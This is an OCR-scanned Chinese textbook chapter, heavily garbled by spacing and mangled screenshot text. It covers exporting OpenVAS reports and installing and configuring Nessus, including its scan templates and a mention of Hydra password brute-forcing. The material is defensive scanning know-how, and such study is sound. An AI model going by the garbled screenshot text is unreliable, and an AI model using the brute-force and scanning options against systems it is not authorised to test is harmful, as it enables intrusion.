[step 园 扫描 结束 后 可 以 通过 左上 方 选择 不 同 
的 格式 导出 扫描 报告 ， 如 下 图 所 示 。 
[EE 


Anonymous XML 


@ Report: Results (52 of 373) 


[step 较 这 里 包含 了 大 量 的 导出 格式 ， 单 击 导 
出 格式 右 侧 的 下 拉 按 钮 ， 可 以 在 弹出 的 下 
拉 列 表 中 进行 选择 。 这 里 以 导出 PDF 格式 为 
例 ， 如 下 图 所 示 。 

LaTeX 

NBE 


Topology SVG 


TXT 


step 国 选择 完 导 出 格式 后 ， 单 击 向 下 箭头 的 
图 标 可 以 导出 扫描 报告 ， 同 时 可 以 选择 直 
接 打 开 或 存放 到 某 一 位 置 ， 如 下 图 所 示 。 


2. 其 他 功能 


Opening report-c3771d60.0794-4416-8856 -cade0e048d65xml 办 
You rave chosento oper 
report-c3771660-0794-4416-8866-c8de0eD48d65 xml 


Whichis: XML 文 类 (497 kB) 
From httpsy1127.0.0.1:9392 


What should Firefox do withthis file? 
Dpen with | 文本 编辑 绪 (default) ~ 
= 


Dothis automatically for files like this from now on 


Cancel | ox | 


[step 国 如 有 果 选 择 直接 打开 ， 可 以 直接 打开 
并 导出 扫描 报告 ， 如 下 图 所 示 。 可 以 看 到 
OpenVAS 会 按照 分 类 生成 PDF 格式 的 文档 。 
这 个 文档 的 可 读 性 还 是 很 高 的 ， 主 要 包括 漏洞 
的 分 析 、 修 复方 案 以 及 修复 补丁 的 地 址 等 。 


国 | .= 7 reporcamlds0-07944., | s96 -| Qa| = O00 
Res Overview 3 ~ 

Host Authenticatons 3 
~ Resuts per Host 3 
= 192.168.1.105 3 
Hignaoncp 5 
High1099hicp 10 
Hgnslanop 了 


Highslcp 了 2 
Higne200nep 12 
High generalhcp 13 


Highn2ljtcp 14 
Hign1s24ncp 15 
HighSl2hcp 15 


High3306lcp 。 16 
Hgns4azhep 17 


High590oncp 。 18 
High3632tcp 18 
High 22Itcp 19 
Medium aocp 20 
Medum2litcp 29 
Mecium 6667/tep 30| 


除了 上 述 介绍 的 功能 外 ，OpenVAS 还 提供 有 很 多 其 他 功能 ， 下 面 分 别 进行 介绍 。 
(1) 以 图 表 的 形式 查看 扫描 报告 功能 。OpenVAS 会 将 扫描 的 漏洞 以 图 表 的 形式 进行 
展现 ， 通 过 选择 Assets 菜单 下 的 Operating Systems 菜单 项 可 以 以 图 表 形式 查看 扫描 报告 ， 


如 下 图 所 示 。 


os| Operating Systems (6 of 6) 


~ _ Operating Systems by Severity C... ~ Operating Systems by Vulnerabil. ~ _ Operating Systems by CVSS (Tota... 


国 High 

6.0 

cpes/orlinuekemel| 55 

50 

/o:canonicalubunty inux 45 

40 

cpe:/o:microsoftwindows| 3.5- 

30 

nonicatubuntu nux8.04 25 

20 

/odedlan-deblan linux| 15 

1.0 

Jo:microsoft windows_xp| 05 
TE 
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(2) 以 不 同 评分 参考 标准 展现 扫描 结果 。 在 OpenVAS 中 给 出 了 不 同 的 漏洞 评分 参考 
标准 ， 并 以 图 表 或 详细 列表 的 形式 进行 展现 。 该 功能 存放 在 SecInfo 菜单 列表 之 中 ， 如 下 
图 所 示 。 


Configuration 


Dashboard 
NVTs 

CVEs 

CpEs 

OVAL Definitions 
CERT-Bund Advisories 
DFN-CERT Advisories 


(3) 以 NVTs 参考 标准 展示 漏洞 图 表 功 能 。 选 择 NVTs 菜单 命令 ， 在 打开 的 下 图 所 示 
的 界面 中 列 出 了 使 用 NVTs 参考 的 漏洞 图 表 展示 ， 以 及 漏洞 数量 。 


[ 
向 NVTs (48054 of 48054) 回 


(4) 以 CVEs 参考 标准 展示 漏洞 图 表 功 能 。 选 择 CVEs 菜单 命令 ， 在 打开 的 下 图 所 示 
的 界面 中 列 出 了 使 用 CVEs 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 数量 。 
[ 0 CVEs (114679 of 114679) 


40.000- 
9.9005.000- 
30.000. 
25.000: 
20/000- 
15.000; 
0,000; 
0 
站 


1 


199919852900200520102015 


(5) 以 CPEs 参考 标准 展示 漏洞 图 表 功 能 。 选 择 CPEs 菜单 命令 ， 在 打开 的 下 图 所 示 
的 界面 中 列 出 了 使 用 CPEs 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 数量 。 


~ CPEs by CVSS (Total: 286689) 


0 
AS TZ34567891 
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(6) 以 OVAL 参考 标准 展示 漏洞 图 表 功 能 。 选 择 OVAL Definitions 菜单 命令 ， 在 打开 
的 下 图 所 示 的 界面 中 列 出 了 使 用 OVAL 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 数量 。 


OV | 
_ © ovAL Definitions (28175 of 28175) 


e. 可 转 miscellaneous 
so Na 国 patch 
. - 国 vulnerabitity 
| a : 
9 


(7) 以 CERT-Bund 参考 标准 展示 漏洞 图 表 功 能 。 选 择 CERT-Bund Advisories 菜单 


命令 ， 在 打开 的 下 图 所 示 的 界面 中 列 出 了 使 用 CERT-Bund 参考 标准 展示 的 漏洞 图 表 ， 
以 及 漏洞 数量 。 


8 cERTBund Advisories (9209 of 9209) 


~ CERT-Bund Advisories by CVSS (To... 


和 
NAS TEL34s670910 


(8) 以 DFN-CERT 参考 标准 展示 漏洞 图 表 功 能 。 选 择 DFN-CERT Advisories 菜单 命令 ， 
在 打开 的 下 图 所 示 的 界面 中 列 出 了 使 用 DFN-CERT 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 
数量 。 


ER 


_ © DFN-CERT Advisories (18721 of 18721) 


~ DFN-CERT Advisories PE 


国 High 

Medium 

ow 
NA 


NAD123456718910 


人 @ 提 示 : 可 以 通过 每 个 界面 中 的 查询 ， 查 询 出 某 个 漏洞 在 该 评分 标准 中 的 信息 。 


12.5 “使 用 Nessus 扫 描 漏 洞 


Nessus 是 目前 使 用 最 为 广泛 的 系统 漏洞 扫描 与 分 析 软件 ， 该 工具 提供 了 完整 的 漏洞 扫 
描 服务 ， 并 随时 更 新 漏洞 数据 库 。Nessus 不 同 于 传统 的 漏洞 扫描 软件 ， 可 同时 在 本 机 或 远 
端 进行 系统 的 漏洞 扫描 分 析 。 
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12.5.1 ”下载 Nessus 软 件 


在 使 用 Nessus 扫 描 系 统 漏洞 之 前 ， 首 先 需要 下 载 Nessus 软 件 ， 有 具体 操作 步骤 如 下 : 
step 国 在 浏览 器 的 地 址 栏 中 输入 网 址 https://www.tenable.com/downloads， 在 下 载 页 面 中 找 
到 Nessus 软 件 ， 如 下 图 所 示 。 


Downloads 


Nessus 


Download Nessus and Nessus Manager. 


单 击 Nessus 会 跳 转 到 Nessus 软 件 下 载 界 面 ， 如 下 图 所 示 。 


Nessus 


Need an Activation Code? 


In order to complete your Nessus instollation, you need an activation code ifyou dont have one atready， 


Binary download fles for Nessus Professional, Nessus Manager and connecting Nessus Scanners to Tenablejo & SecuriyCenter 


[step 国 Nessus 家 用 版 是 免费 的 ， 但 是 也 需要 [step 园 在 注册 界面 中 ， 输 入 用 户 名 与 邮箱 
注册 获取 注册 码 ， 单 击 Get Activation Code 地址， 单 击 Register 按 钮 ， 会 提示 注册 码 已 
按钮 ， 跳 转 到 版 本 界面 ， 如 下 图 所 示 。 发 送 至 你 的 邮箱 ， 然 后 会 出 现 一 个 下 载 按 
钮 ， 如 下 图 所 示 。 


Free 
Download Nessus 


Nessus® Home allows you Lo scan your personal home network with the To download Nessus, visit the Nessus 


same powerful scanner anjoyed by Nessus subscfibers 
Download page. 


For Home Users 


Scan 16 IPs 


Nessus Home features: 


High-speed, accurate assessment with thousands of checks 


登录 邮箱 会 发 现 Nessus 发 送 的 激活 
Agentless scanning of home networks 码 ， 如 下 图 所 示 。 


EE 


单 击 Register Now 按 钮 ， 跳 转 到 注册 
界面 ， 如 下 图 所 示 。 Nessus Home Evaluation 


Welcome to Nessus Home and congratulations on taking action to secure 
your personal network! We offer the latest plugins for vulnerability scanning 
today, helping you identify more vulnerabilities and keep your personal 
Network protected. 


Register for an Activation Code 


First Name * Last Name * 


Ifyou use Nessus in a professional capacity and want advanced capabilities 
Email* such as unlimited assessments, or the ability to perform compliance checks 
or content audits, Nessus Professional may be better suited to your needs. 
To learn more view the Nessus Professional datasheet or request a free 


Dcheckto receive updatesfrom Tenable 人 

| Register | Activating Your Nessus Home Subscription 
Your activation code for Nessus Home is: 
3 
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[sep 回 输入 uname -a 命 令 查看 kail 内 核 信 
息 ， 以 选择 需要 下 载 哪个 版 本 的 Nessus 软 
件 ， 如 下 图 所 示 。 

和 Uname -a 


inux kali 4.18.6-kati2-amd64 #1 SMP Debian 4.18.16-2katil 
(2618-16-69) x86 64 GNU/Linux 


Estee 国 根据 自己 的 系统 选择 相应 的 版 本 。 
这 里 选择 Debian 系 统 类 型 的 版 本 ， 如 下 图 
所 示 。 


Nessus-000-debians Basdeb Deblan ,7,6,9/ Kall Un 1, 20173 a6(32-biU checksom 

Nessus-d00dmg macos (108 chedksom 

个 Nessus800-es5D86rpm Rm at oracte Chedksun 
including unbreakable Enterprise Kemel) 

Nessus-g0.0-amenxg6 6hrpm Chedson 

op Nossus-8.0.0-es686 GDIN cemo cle Un Cedaum 
including Unbreakable Enterprise Kemel 

人 - Debian & 7, 6,9 /Kalil 73 MMDeh Ce 

deblang amd6hdleb 


step 图 选择 版 本 后 会 弹出 一 个 许可 协议 ， 单 
击 IAgree 按 钮 ， 如 下 图 所 示 。 


License Agreement 


[sep 可 浏览 器 会 弹出 一 个 打开 还 是 保存 文件 
的 信息 提示 ， 这 里 选择 保存 ， 单 击 OK 按钮 
即 可 开始 下 载 并 保存 Nessus 软 件 ， 如 下 图 
所 示 。 

Opening Nessus-8.0.0-debian6_amd64.deb © 
You have chosen to open: 


Nessus-8.0.0-deblan6_amd64.deb 


whichis: Deblan 软件 包 (63.8 MB) 
trom: https://lenable-downtoads-production's3.amazonaws.com 


What should Firefox do with this file? 
归档 管理 器 (default) ~ 


Dothis automatically for files like this from now on. 


12.5.2 ”安装 Nessus 软 件 


Nessus 软 件 下 载 完 成 后 ， 就 需要 安装 
了 。 具 体操 作 步骤 如 下 : 
[step 图 声 换 到 Nessus 安 装 包 目录 ， 使 用 
dpkg -i Nessus-8.0.0-debian6 amd64.deb 命 
令 ， 执 行 安装 ， 执 行 效果 如 右上 图 所 示 。 
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安装 完成 会 提示 用 于 登录 管理 界面 的 网 络 
地 址 。 


FatEKRSUIS-7DSNNTOSGSF dpkg “1 Nessus-8-0.0-deDranG 106-96F 
正在 选中 未 先 择 的 软件 包 nessus。 

(正在 读 更 数 据 库 ..。 系统 当前 共 安装 有 379781 个 文件 和 目录 。) 
准备 解压 Messus-8.6.9-debian6_and64.deb ... 

正在 解压 nessus (8.6.0) ... 

正在 设置 nessus (8.8.9) 

npacking Nessus scanner core Components... 


- You can start Nessus Scanner by typing /etc/init.d/nessusd star 
~ Then go to https://kati;8834/ to configure your scanner 


正在 处 理 用 于 systemd [239-19| 的 触发 严 ... 


step 图 使 用 /etc/init.d/nessusd start 命 令 ， 启 动 
Nessus。 执 行 效果 如 下 图 所 示 ， 说 明 Nessus 
已 经 启动 。 


root@kali: -~/Downloads# /etc/init.d/nessusd start 
Starting Nessus : . 


[step 图 在 网 页 浏览 器 中 输入 https://kali: 
8834” 网 址 ， 打 开 Nessus 网 页 管理 界面 。 首 
次 打开 会 提示 网 页 没有 安全 证 书 ， 如 下 图 
所 示 。 


[21 cn is nt 


wd therr website mproperly. To protect your infarmation from boing slen Firefon has 


bae his to rotp Man gent and block malicou saes, 


Er 


单 击 Advanced 按 钮 ， 进 入 如 下 图 所 示 
的 高 级 选项 页 面 。 


Add Exceptlon, 


step 图 在 高 级 选项 页 面 中 ， 单 击 Add 
Exception 按 钮 ， 添 加 证 书 为 可 信 ， 然 后 单 
击 Confirm Sercurity Exception 按 钮 ， 获 取证 
书 ， 如 下 图 所 示 。 

Add Security Exception © 
[oO ec 


Legitimate banks stores, andother public sites will not ask youto dothis. 
Serer 


Use [ weesasal 


Centifcate status 
This slte attempts to identify itsetf with invabidinformation 


Uninown dentity 


Tne certiteate 


usted becaue trast been veriledas Issved bya tusted authorlty' 


eermanenty store this Exception 


Cenfrm securiy Exception Cancel 


step 图 首次 登录 需要 先 注册 一 个 管理 员 账 
号 。 下 图 为 管理 员 注 册 界 面 。 


Nessus 息 | 


Create an account 


Paasword 


Estee 车 在 管理 员 注册 界面 中 ， 给 入 完 用 户 命 
与 密码 ， 单 击 Continue 按 钮 ， 跳 转 到 注册 激 
活 界面 ， 输 入 邮箱 获取 的 激活 码 ， 如 下 图 
所 示 。 


Nessus@ 


Register your scanner 


Scanner Type 


Home. Prolassional or Manager 


Activatlon Code * 


Policies 


Gs 


Policles allow you to create custom templates defining what actions are performed during a scan. Once 
created, they can be selected from the list of scan templates. From this page you can view, create, 
Import, download, edit, and delete policies. 


Create a new pollcy 
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step 图 激活 以 后 Nessus 会 初始 化 目前 的 漏洞 
检测 库 ， 如 下 图 所 示 。 


Nessus@ 


Initializing 


等 待 漏洞 检测 库 更 新 完成 后 ， 登 录 并 
进入 主 界面 ， 如 下 图 所 示 。 


My Scans pr ovFan 


全 注意 : Nessus 与 OpenVAS 不 同 ，Openvas 
在 进行 扫描 之 前 需要 一 个 配置 、 定 义 一 个 
主机 、 创 建 一 个 任务 然后 才能 进行 扫描 ， 
而 Nessus 则 是 选择 不 同 的 策略 。 


step 辆 在 首页 中 选择 左 侧 的 Policies 选 项 ， 进 入 策略 项 界面 ， 如 下 图 所 示 。 


Cr oe | 


Estee 加 首次 进入 是 没有 创建 策略 的 ， 这 里 需要 先 创建 一 个 策略 ， 单 击 New Policy 按 钮 ， 创 


建 一 个 新 的 策略 。 用 户 也 可 以 在 打开 的 下 图 所 示 界 面 中 选择 Nessus 给 出 的 策略 模板 。 


[Polcy Templates 


« Back to Polioles 


Scanner 


赐 A [2 E 人 
Advanced Scan Audit Cloud AN Badlock Detection Bash Shellshock Detection Basic Network Scan 
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( 斧 提 示 : Nessus 默 认 提 供 了 很 多 策略 模 
板 ， 选 择 相应 的 模板 即 可 ， 当 然 它 是 一 
个 商业 版 漏洞 扫描 器 ， 因 此 有 一 些 模板 
是 收费 的 ， 凡 是 右上 角 注 有 upgrade 字 样 
的 都 需要 升级 到 专业 版 及 以 上 版 本 才 可 
以 使 用 。 


解 每 一 项 的 作用 对 于 配置 适合 的 扫描 类 型 
有 多 大 帮助 。 

高 级 扫描 设置 的 操作 步骤 如 下 : 
[step 图 在 Policy Templates 设 置 界面 中 选择 
Advanced Scan 选项 ， 进 入 Advanced Scan 设 
置 界 面 ， 如 下 图 所 示 。 


New Policy / Advanced Scan 
< Back to Policy Templates 


12.5.3 ”高 级 扫描 设置 


高 级 扫描 (Advanced Scan) 是 Nessus 
提供 的 一 个 针对 所 有 网 络 设备 的 基础 扫 
描 ， 其 他 类 型 的 扫描 都 是 基于 它 的 扩充 或 
者 修改 。 高 级 扫描 中 有 很 多 的 设置 项 ， 了 


BASIC 


Setings Credentlals © Complance Plugins 


[step 图 在 基础 (BASIC) 信息 设置 界面 中 ， 
可 以 输入 名 字 ， 以 及 一 些 描述 信息 ， 如 下 
图 所 示 。 


Name 
General 


Pei 
Description 
pscoveny 

ASSESSMENT 

REPORT 


ADvANCED 


选择 DISCOVERY (权限 ) 选项 ， 该 选项 提供 有 3 个 子 选项 ， 包 括 Host Discovery ( 主 
机 发 现 ) 、Port Scanning (端口 扫描 ) 、Service Discovery (服务 发 现 ) ， 如 下 图 所 示 。 


pscoveny 
Host Discovery 
Por Scanning 
Sevice Discovery 

ASSESSMENT 

REPORT 


ADVANCED 


选择 Host Discovery 选 项 ， 在 打开 的 界面 中 可 以 设置 Ping 远 程 主机 的 方法 ， 包 括 两 
项 ， 第 1 项 表示 本 机 在 测试 范围 之 内 ， 第 2 项 为 快速 网 络 发 现 。 如 果 远 程 主机 发 送 Ping 包 ， 
Nessue 为 了 避免 误 报 会 执行 其 他 操作 来 验证 ， 如 下 图 所 示 。 


me 


NscoVEAY 


EpoRT 


和 罗 提示 : Ping 包 的 模式 选择 ， 如 下 图 所 示 。 这 里 可 以 选择 多 种 协议 类 型 ， 包 括 ARP、 
TCP、ICMP 及 UDP 等 。 由 于 UDP 测试 并 不 是 很 准确 ， 所 以 这 里 默认 并 没有 选择 ， 但 是 仍 
然 提 供 有 该 选项 。 
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Destination pons bultin 


< 


ICNP 
Assume ICMP ureachable fom the gateway means the hosts dam 
Maximum number of retres 2 


UDP 


step 国 比较 脆弱 的 网 络 设备 有 3 个 选项 可 供 
选择 ， 包 括 是 否 有 共享 打印 、 扫 描 网 络 设 
备 、 扫 描 网 络 控制 设备 ， 如 下 图 所 示 。 


ragile Devices 


Scan Network Printers 
Scan Novell Netware hosts 


Scan Operational Technology devlced 
设置 局 域 网 唤醒 选项 ， 可 以 加 入 含有 
MAC 地 址 表 的 文件 ， 以 及 唤醒 等 待 时 间 ， 
这 里 以 分 钟 为 单位 ， 如 下 图 所 示 。 


ake-on-LAN 
List of MAC addresses Add Flle 
Boot time walt (In minutes) 时 | 


选择 端口 扫描 ， 进 入 端口 过 滤 设 置 
界面 ， 如 果 选 中 Consider unscanned ports as 
closed 复 选 框 ， 则 扫描 的 端口 将 视 为 关闭 不 再 
进行 扫描 ， 这 里 建议 不 选中 ， 如 下 图 所 示 。 


RSIC 
Pons 
DISCOVERY ” 
Consider unscanned ports as closed 
Host Discovery 


Por Scannin Port scan range: 。 default 


Service Discovery 

本 地 端口 集合 设置 界面 ， 这 里 优先 检 
查 SSH、WMI、SNMP 这 些 服务 端口 ， 只 有 
当 本 地 端口 枚 举 失 败 后 才 运 行 网 络 端口 扫描 
程序 。 最 后 一 项 默认 没有 义 选 ， 它 用 于 验证 
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本 地 所 有 打开 的 TCP 端 口 ， 如 下 图 所 示 。 


Cocal For EnUmerators 


lv SSH (netstat) 

lv WMI (netstat) 

lw SNMP 

lv Ony run network port scanners if local port enumeration failt 

Venify open TCP pots found by local port enumerators 
[Sep 图 网 络 端 口 扫描 使 用 默认 的 SYN 包 进 
行 检测 ， 如 果 需 要 进行 防火 墙 过 滤 检 测 可 
以 选中 下 方 的 Override automatic firewall 
detection 选 项 ， 这 里 给 出 了 3 个 模式 : 默认 
简单 检测 (Use soft detection) 、 主 动 检 
测 (Use aggressive detection) 、 禁 用 检测 
(Disable detection) ， 如 下 图 所 示 。 


NeIWOTK Por SCanners 


v syN 


Overide automalic firewall datection| 


选择 服务 发 现 选 项 ， 探 测 所 有 端口 以 
查找 服务 ， 尝 试 将 每 个 开放 端口 映射 到 该 
端口 上 运行 的 服务 ， 如 下 图 所 示 。 

General Settings 


V Probe all ports to find services 


注意 ， 在 一 些 罕见 的 情况 下 ， 这 可 
能 会 中 断 一 些 服务 ， 并 导致 不 可 预见 的 副 
作用 。 

[Sep 回 搜索 SSL/TLS 服 务 界 面 ， 默 认为 打开 
状态 ， 可 以 选择 只 搜索 SSL/TLS 服 务 ， 或 搜 
索 所 有 端口 ， 识 别 是 否 有 快 过 期 的 证 书 ， 
默认 选择 枚 举 所 有 SSL/TLS 密 码 ， 启 用 CRL 
检查 (连接 到 Internet) ， 如 下 图 所 示 。 


earch for SSLTLS savices ® 
Known SSUTLS ports 


Search for SSUTLS on 


Known SSUTLS ports 
ldentify certificates expiing wthin 
Al ports 


¥ Enumerate al SSLTLS ciphers 


Enable CRL checking (connects to the Intemet) 
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Estee 在 Accuracy 界 面 中 可 以 进行 准确 性 设 

置 和 执行 彻底 扫描 ， 其 中 准确 性 有 两 项 可 

选 ， 第 1 项 避免 可 能 存在 的 虚假 报警 ， 第 2 

项 显示 出 可 能 存在 的 虚假 报警 ， 执 行 彻底 

的 测试 ， 这 个 存在 一 定 风险 ， 可 能 破坏 网 

络 或 影响 扫描 速度 ， 如 下 图 所 示 。 
| 


Overde normal accuracy 


上 
step 图 在 Antivirus 与 SMTP 界 面 中 ， 可 以 对 
反 病 毒 定义 宽 限 期 〔 以 天 计 ) ， 可 以 对 邮件 
设置 域名 、 服 务 器 地 址 等 ， 如 下 图 所 示 。 
Kntivirus 


Antivius definition grace perlod (in days); 0 ~ 


BMTP 


[Third party domain example.com 


From address nobody@example.com 


[To address postmaster@[AUTO_REPLACED_IP] 


[step 贺 在 General Settings 与 Oracle Database 
设置 界面 中 ， 可 以 设置 用 户 默认 提供 的 凭 
证 ， 如 果 用 户 的 密码 策略 设置 为 在 多 次 无 
效 尝试 后 锁定 账户 ， 则 用 于 防止 账户 锁 
定 ， 使 用 Oracle 数 据 库 测 试 默认 账户 可 能 会 
比较 慢 ， 如 果 有 需要 也 可 以 选择 ， 如 下 图 
所 示 。 


snoral Settings 


2 Only use credentals provided by the user 


侈 提 示 : Nessus 启 用 了 Hydra (在线 密 码 
破解 ) 工具 配合 生成 密码 规则 ， 如 下 图 所 
示 。 这 里 可 以 导入 登录 账号 文件 ， 登 录 密 
码 文件 等 ， 并 设置 并 行 任务 数量 、 超 时 时 
间 、 尝 试 空 密码 、 尝 试 以 密码 登录 、 在 第 
一 次 成 功 后 停止 暴力 强迫 、 测 试 默认 账户 
等 参数 。 


232 


全 注意 : Nessus 还 具有 其 他 高 级 扫描 设置 
选项 ， 这 里 不 再 详细 介绍 ， 用 户 可 以 自行 
安装 该 软件 后 ， 然 后 打开 该 软件 的 设置 界 
面 ， 从 中 学 习 各 个 设置 选项 的 作用 。 


12.5.4 其 他 扫描 项 


Nessus 除 了 提供 高 级 扫描 以 外 ， 还 设置 
了 一 些 其 他 个 性 扫描 ， 这 些 个 性 扫描 有 的 
是 针对 特殊 漏洞 ， 有 的 是 针对 不 同 设备 。 


1. Balock Detection 漏 洞 


Badlock Detection 是 一 种 “协议 /中 间 
人 ”攻击 漏洞 ， 可 用 模拟 Windows AD 〈 通 
过 批量 创建 和 编辑 用 户 账户 ， 指 派 管理 权 
限 等 ) 已 验证 的 用 户 身份 发 动 攻击 。 在 此 
种 攻击 中 ， 攻 击 者 可 被 授予 读 写 SAM 数 
据 库 的 权限 ， 可 能 造成 所 有 用 户 名 密码 和 
其 他 潜在 敏感 信息 泄露 。 漏 洞 编 号 CVE- 
2016-2118 和 CVE-2016-0128， 在 Nessus 扫 
描 模板 中 图 标 如 下 图 所 示 。 


| 


Badlock Detection 


针对 Badlock Detection 漏 洞 ，Nessus 提 
供 的 扫描 插件 ， 如 下 图 所 示 ， 这 里 只 列 出 
了 部 分 ， 具 体 请 参考 软件 本 身 ， 其 他 扫描 
类 型 的 插件 也 同样 截取 部 分 。 
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Seangs Clecenat prugt 
PluGINFAvEY To 国 rucnww muemp ~ 
CertOS Local Securiy Checks < Certos 5- samba [CESA-2016.0621) (Badioch) sos52 
FieeB5D Local Securty Checks 六 Certos 5; sambagy (CESA-20150613) Badoc So451 
General 1 Certos 5.17; ipa/ ibidb / Hbtalloc / itdb / fvtevent / openchange | samba .© S0450 
Ms 了 Cartos 6: samba [CESA-2016:0611) (Badloch EP 
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2. Bash Shellshock Detection 漏 洞 


Bash Shellshock Detection 漏 洞 ， 又 称 为 破 壳 漏 洞 ， 会 影响 目前 主流 的 Linux 和 Mac OSX 
操作 系统 平台 。 在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


Bash Shellshock Detection 


针对 破 壳 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Sotings cteoenals plugine 
PLUGINFAMEY Tomt Puuemio ~ 
Certos Local Secunly checks 17 -besh (CESA-2014 1299) (shadlshoch) T7835 
Col abuses 51617; bash (CESA-2014:1306) T7679 
Dealan Local Securty Checks 


urty checks 
FieeBsD Local Secufty Checks 

FTP 4‘ 
Gan a shel lomorey 


General 1 


CO 


. Basic Network Scan 


Basic Network Scan， 基 础 网 络 设备 扫描 。 这 里 针对 基础 网 络 设 备 ， 比 如 Windows 系 
统 、Linux 系 统 、 路 由 器 、 交 换 机 等 ， 在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


从 


Basic Network Scan 


针对 基础 网 络 设备 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 
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Setings Crodentas Plugins © 
PLUGN FaMty tom 故 Pucmnae mvcmo 目 
Amazon Linux Local Securiy Checks ls4 2 Chort TuxCienesystem ActiveX Instalcient) Method Aratray MSI pa 。。 583221 
Bachdoor 了 4 3CTIpSvc Long Transpon Mode Romoto Overtow 23735 
Brute force atacks 二 2DFTP Muipe Drsctory Taversal Vnoranlities 23218 
Certos Local Securky Cnecks 2668 DGrectngs Playor Actvex Mutipe Buticr Cveriows 26020 
Col abuses E21 3vx MPEG4 < 5.0.2 Bufle Oveflow 29749 
Col abuses : XSS 569 7zp< 1600 Mukiple Vulnerabiitics 912a0 
asco S52 7zp< 16.03 NULL Painter Dereterence Dos 109790 


4. Credenticled Patch Audit 


Credenticled Patch Audit， 补 丁 扫描 。 主 要 是 针对 不 同 设备 更 新 补丁 的 一 个 扫描 ， 在 
Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


Credentialed Patch Audit 


针对 网 络 设备 补丁 扫描 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Sotings Crodomag plugins 他 
PLUGIN FaMtY Tom 国 mucwnwc mvcwip 卜 
Amazon Linux Local Securty Checks 54 AIX 53 .IY20496 22373 
ContOS Local Secunty Checks 6568 AIX S51 .IY21300 22374 
asco 2 A S12 75 
Dataposes s05 A S12 2a76 
Debian Local Securty Checks se22 AIX S51. IY23041 22377 
FS Networhs Local sect 7 AIX 51: IY23946 22378 
Fedora Local Securty checks 12861 AIX 51: IY23947 22379 


5. Intel AMT Security Bypass 


Intel AMT Security Bypass 针 对 Intel 一 款 远 超 控制 功能 的 芯片 漏洞 扫描 ， 在 Nessus 扫 描 
模板 中 的 图 标 如 下 图 所 示 。 


Intel AMT Security Bypass 


针对 Intel 芯 片 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 
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Pucwp 


6. Malware Scan 


Malware Scan， 亚 意 软件 扫描 。 该 功能 主要 是 用 于 对 已 知 恶意 软件 添加 特征 ， 通 过 这 些 
特征 比 对 判断 目标 主机 是 否 存 在 相应 恶意 软件 ， 在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


Malware Scan 


针对 恶意 软件 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Puucwim 


ie 1 
Msc. 1 45005 
Sotings 80518 
Web Servars i 10024 
Window 12027 

12069 


Windows : User management 


7. Shadow Brokers Scan 
Shadow Brokers Scan， 代 理 漏洞 扫描 。 该 扫描 主要 针对 本 地 或 远程 代理 存在 的 漏洞 ， 
在 Nessus 扫 描 模 板 中 的 图 标 如 下 图 所 示 。 


Shadow Brokers Scan 


针对 代理 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 
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Serings Credentias Plugins 
Puenp ~ 


emal (CESA 2005-350) aaazg 


Puucm puty TomL 四 mucnww 
centos Local secumy checks 7 | 


cel shuses 


clsco 


8. Spectre and Meltdown 漏 洞 


Spectre and Meltdown 漏 洞 ， 幽 灵 与 熔断 漏洞 ， 芯 片 级 安全 漏洞 。Spectre 中 文 名 “ 幽 
灵 ”， 有 CVE-2017-5753 和 CVE-2017-5715 两 个 变 体 ，Meltdown 中 文 名 “熔断 ”， 有 CVE- 
2017-5754 一 个 变 体 ， 在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


广 


Spectre and Meltdown 


针对 幽灵 与 熔断 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Setng Credertis Pluglna 
Puucmpwwty TomL 国 rucnwws Puonp ~ 
AM Local Securty Cnecks 7 A $.3 TL 12: spocte_motoown 003020) Mokgown) (Spoctrs) osaln 

al secully checks x 6 LTL 9: spee 100311 
也 AM 7 1 TL 4: spec 10691 
NM 711L 5: spec 00020) 106913 
的 210631 
1 A 7 2 TL 1 : spectie_ inelto oa 
1 AMXT2TL2 : spectre_meltown 0103036 (Malidown) (Spectre) 106916 


9. WannaCry Ransomware 

WannaCry Ransomware， 勒 索 病毒 扫描 。 该 扫描 主要 针对 永恒 之 蓝 勒 索 类 病毒 的 一 个 
扫描 ， 可 以 选择 提供 Windows 账 号 密码 ， 这 样 通过 WMI 进 行 测试 ， 列 举 存 在 哪些 软件 更 
新 ， 在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


图 


WannaCry Ransomware 


针对 勒索 病毒 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 
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Sorngs Ciecemiats plugins < 
PLUGIN PAY 
Setlings 
Windows 


Windows : Microsoft Buletins 


~ pcw Nam 
Malicins Process Detection 
MS17.010: Security Update for Microsoft Windons SMB server (4013339) ( 
Server Message Block [SM3) Protocol Version 1 Enebled 


SNB Server DOUBLEPULSAR Bockdoor/ Implant Detection (EtemaRocks) 


Puuemi 


se275 


10. Web Application Tests 


Web Application Tests，Web 应 用 渗透 扫描 。 该 扫描 主要 针对 网 络 应 用 的 渗透 测试 ， 在 


Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


Web Application Tests 


针对 网 络 应 用 渗透 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Sorings cieeenals plugin 全 


PLua FAvEY 
Col abuses 

Col abuses : XSS 
Satings 


‘Web Seven 


12.5.5 ”开始 扫描 漏洞 


~ muon wm 
bash_hsloy Flies Disclosed Win Web Server 
‘sventres Dsclosed via Web Server 
2BGal disp_aloum php id_abum Parameter SQL Inlection 


3Com Network Supervisor Traversel Arbiran File Access 


3Com Web Managemert nierace Default Crecentials 


Puemi 


8s346 


19go9 


73190 


e212 


21020 


14830 


本 小 节 使 用 Nessus 从 创建 新 的 扫描 开始 ， 建 立 一 个 完整 的 扫描 直到 最 后 的 漏洞 报告 。 
